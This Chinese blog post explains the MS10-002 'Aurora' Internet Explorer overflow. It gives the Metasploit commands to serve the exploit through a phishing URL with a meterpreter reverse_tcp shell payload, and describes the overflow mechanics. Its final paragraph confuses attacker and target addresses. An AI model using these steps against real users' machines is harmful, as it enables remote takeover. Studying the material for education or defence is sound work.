1. 程式人生 > 實用技巧 >【漏洞利用及其原理分析】<微軟><IE瀏覽器><MS10-002>

【漏洞利用及其原理分析】<微軟><IE瀏覽器><MS10-002>

[利用MS10-002進行簡單釣魚攻擊演示] (https://www.cnblogs.com/ying0x00/p/14247650.html)

一、漏洞簡介:

MS10-002:

IE瀏覽器漏洞,也稱 “極光”漏洞,緩衝區溢位漏洞導致的遠端程式碼執行

二、攻擊過程:

1.攻擊者生成一個url,通過掛黑鏈或者釣魚網站,使攻擊者訪問此url

2.被攻擊者訪問url,與url的地址建立TCP連線,傳送httpget請求,url地址伺服器 回覆http 200ok(內容包含填充date,payload),讓被攻擊者瀏覽器程式產生緩衝區溢位

3.被攻擊者執行payload,主動與攻擊者主機建立shell的tcp連線,使攻擊者拿到shell控制權

三、metasploit基本命令

search ms10-002 // 查詢ms10-002

use exploit/windows/browser/ms10_002_aurora // 使用ms10-002漏洞

set PAYLOAD windows/meterpreter/reverse_tcp //設定padload

set LHOST <ip> //設定本地主機ip地址

set SRVHOST <ip> //設定監聽主機ip地址

set Lport <port> //設定服務埠號

exploit //啟動服務

四、詳細解讀

payloadwindows/meterpreter/reverse_tcp

,是一個shell反彈的惡意程式碼,被攻擊執行了後會向你指定的ip地址的發起shell連線,連線後我們就可以控制靶機了

五、原理分析

​ 靶機通過ie瀏覽器訪問了我們的釣魚網站,靶機出來主動與我們建立連線,首先是正常的三次握手,握手完成之後,攻擊者(我們)會發生大量資料,以及惡意程式碼payload,使其緩衝區溢位,覆蓋原有的函式指標,執行我們的惡意程式碼。執行了惡意程式碼,我們這的惡意程式碼是windows/meterpreter/reverse_tcp,靶機會先我們指定的ip地址(即靶機),指定的埠(6666)發起反彈的shell連線,本機就可以控制靶機了。